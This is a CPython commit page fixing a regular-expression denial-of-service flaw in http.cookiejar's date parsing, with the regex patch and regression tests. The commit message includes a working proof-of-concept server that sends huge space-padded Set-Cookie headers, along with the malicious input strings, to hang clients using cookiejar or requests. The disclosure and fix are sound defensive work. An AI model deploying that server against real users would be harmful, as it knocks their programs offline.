Skip to content

Commit 55a6a16

Browse files
vstinnerbcaller
andauthored
bpo-38804: Fix REDoS in http.cookiejar (GH-17157) (#17344)
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular expression denial of service (REDoS). LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar to parse Set-Cookie headers returned by a server. Processing a response from a malicious HTTP server can lead to extreme CPU usage and execution will be blocked for a long time. The regex contained multiple overlapping \s* capture groups. Ignoring the ?-optional capture groups the regex could be simplified to \d+-\w+-\d+(\s*\s*\s*)$ Therefore, a long sequence of spaces can trigger bad performance. Matching a malicious string such as LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!") caused catastrophic backtracking. The fix removes ambiguity about which \s* should match a particular space. You can create a malicious server which responds with Set-Cookie headers to attack all python programs which access it e.g. from http.server import BaseHTTPRequestHandler, HTTPServer def make_set_cookie_value(n_spaces): spaces = " " * n_spaces expiry = f"1-c-1{spaces}!" return f"b;Expires={expiry}" class Handler(BaseHTTPRequestHandler): def do_GET(self): self.log_request(204) self.send_response_only(204) # Don't bother sending Server and Date n_spaces = ( int(self.path[1:]) # Can GET e.g. /100 to test shorter sequences if len(self.path) > 1 else 65506 # Max header line length 65536 ) value = make_set_cookie_value(n_spaces) for i in range(99): # Not necessary, but we can have up to 100 header lines self.send_header("Set-Cookie", value) self.end_headers() if __name__ == "__main__": HTTPServer(("", 44020), Handler).serve_forever() This server returns 99 Set-Cookie headers. Each has 65506 spaces. Extracting the cookies will pretty much never complete. Vulnerable client using the example at the bottom of https://docs.python.org/3/library/http.cookiejar.html : import http.cookiejar, urllib.request cj = http.cookiejar.CookieJar() opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) r = opener.open("http://localhost:44020/") The popular requests library was also vulnerable without any additional options (as it uses http.cookiejar by default): import requests requests.get("http://localhost:44020/") * Regression test for http.cookiejar REDoS If we regress, this test will take a very long time. * Improve performance of http.cookiejar.ISO_DATE_RE A string like "444444" + (" " * 2000) + "A" could cause poor performance due to the 2 overlapping \s* groups, although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was. (cherry picked from commit 1b779bf) Co-authored-by: bcaller <bcaller@users.noreply.github.com>
1 parent ed07522 commit 55a6a16

File tree

4 files changed

+27
-6
lines changed

4 files changed

+27
-6
lines changed

Lib/http/cookiejar.py

Lines changed: 12 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -216,10 +216,14 @@ def _str2time(day, mon, yr, hr, min, sec, tz):
216216
(?::(\d\d))? # optional seconds
217217
)? # optional clock
218218
\s*
219-
([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+)? # timezone
219+
(?:
220+
([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+) # timezone
221+
\s*
222+
)?
223+
(?:
224+
\(\w+\) # ASCII representation of timezone in parens.
220225
\s*
221-
(?:\(\w+\))? # ASCII representation of timezone in parens.
222-
\s*$""", re.X | re.ASCII)
226+
)?$""", re.X | re.ASCII)
223227
def http2time(text):
224228
"""Returns time in seconds since epoch of time represented by a string.
225229
@@ -289,9 +293,11 @@ def http2time(text):
289293
(?::?(\d\d(?:\.\d*)?))? # optional seconds (and fractional)
290294
)? # optional clock
291295
\s*
292-
([-+]?\d\d?:?(:?\d\d)?
293-
|Z|z)? # timezone (Z is "zero meridian", i.e. GMT)
294-
\s*$""", re.X | re. ASCII)
296+
(?:
297+
([-+]?\d\d?:?(:?\d\d)?
298+
|Z|z) # timezone (Z is "zero meridian", i.e. GMT)
299+
\s*
300+
)?$""", re.X | re. ASCII)
295301
def iso2time(text):
296302
"""
297303
As for http2time, but parses the ISO 8601 formats:

Lib/test/test_http_cookiejar.py

Lines changed: 13 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -122,6 +122,13 @@ def test_http2time_garbage(self):
122122
"http2time(%s) is not None\n"
123123
"http2time(test) %s" % (test, http2time(test)))
124124

125+
def test_http2time_redos_regression_actually_completes(self):
126+
# LOOSE_HTTP_DATE_RE was vulnerable to malicious input which caused catastrophic backtracking (REDoS).
127+
# If we regress to cubic complexity, this test will take a very long time to succeed.
128+
# If fixed, it should complete within a fraction of a second.
129+
http2time("01 Jan 1970{}00:00:00 GMT!".format(" " * 10 ** 5))
130+
http2time("01 Jan 1970 00:00:00{}GMT!".format(" " * 10 ** 5))
131+
125132
def test_iso2time(self):
126133
def parse_date(text):
127134
return time.gmtime(iso2time(text))[:6]
@@ -181,6 +188,12 @@ def test_iso2time_garbage(self):
181188
"iso2time(%s) is not None\n"
182189
"iso2time(test) %s" % (test, iso2time(test)))
183190

191+
def test_iso2time_performance_regression(self):
192+
# If ISO_DATE_RE regresses to quadratic complexity, this test will take a very long time to succeed.
193+
# If fixed, it should complete within a fraction of a second.
194+
iso2time('1994-02-03{}14:15:29 -0100!'.format(' '*10**6))
195+
iso2time('1994-02-03 14:15:29{}-0100!'.format(' '*10**6))
196+
184197

185198
class HeaderTests(unittest.TestCase):
186199

Misc/ACKS

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -227,6 +227,7 @@ Zach Byrne
227227
Vedran Čačić
228228
Nicolas Cadou
229229
Jp Calderone
230+
Ben Caller
230231
Arnaud Calmettes
231232
Daniel Calvelo
232233
Tony Campbell
Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
Fixes a ReDoS vulnerability in :mod:`http.cookiejar`. Patch by Ben Caller.

0 commit comments

Comments
 (0)
pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy